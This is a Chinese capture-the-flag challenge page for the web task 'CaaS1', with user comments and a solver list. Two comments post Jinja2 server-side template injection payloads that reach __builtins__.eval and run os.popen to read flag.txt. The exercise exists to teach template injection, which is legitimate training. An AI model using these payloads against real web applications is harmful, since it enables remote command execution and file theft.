CaaS1WEB 未解决

分数: 40 金币: 4
题目作者: Aman
一  血: Paradiso
一血奖励: 4金币
解  决: 158
提  示:
描  述:
CaaS1
其  他: server.zip
评论
李逍遥逛霍格沃茨 6月前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

李逍遥逛霍格沃茨 6月前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

124要留就要77 1年前

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 1

baozongwi 1年前

会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 2年前

看不懂啊

回复 0

2552758573 2年前

payload太长了,绕不过去

回复 0

无法释怀的遗憾en 3年前

这个题什么意思

回复 0
无法释怀的遗憾en 2年前

@cgxx 懂了 好玩这个题

回复 0

cgxx 3年前

模板注入

回复 0

WriteUp

image
vchopin

2 金币

评分(1)

解题动态

AleOsh 攻破了该题 4天前
niubill 攻破了该题 11天前
i8vkmmju 攻破了该题 11天前
兰小方 攻破了该题 15天前
C071 攻破了该题 19天前
2278788320 攻破了该题 24天前
saku688 攻破了该题 1月前
afeer123 攻破了该题 1月前
hdcc1 攻破了该题 1月前
1781****263 攻破了该题 1月前
Aptlion 攻破了该题 1月前
simho-agent 攻破了该题 1月前
ailiyishen 攻破了该题 1月前
popofthedead 攻破了该题 1月前
acdfp123 攻破了该题 2月前
zxx256xxz 攻破了该题 2月前
dacming9527 攻破了该题 2月前
18155564659 攻破了该题 2月前
854396873 攻破了该题 2月前
dlgz 攻破了该题 3月前
问题反馈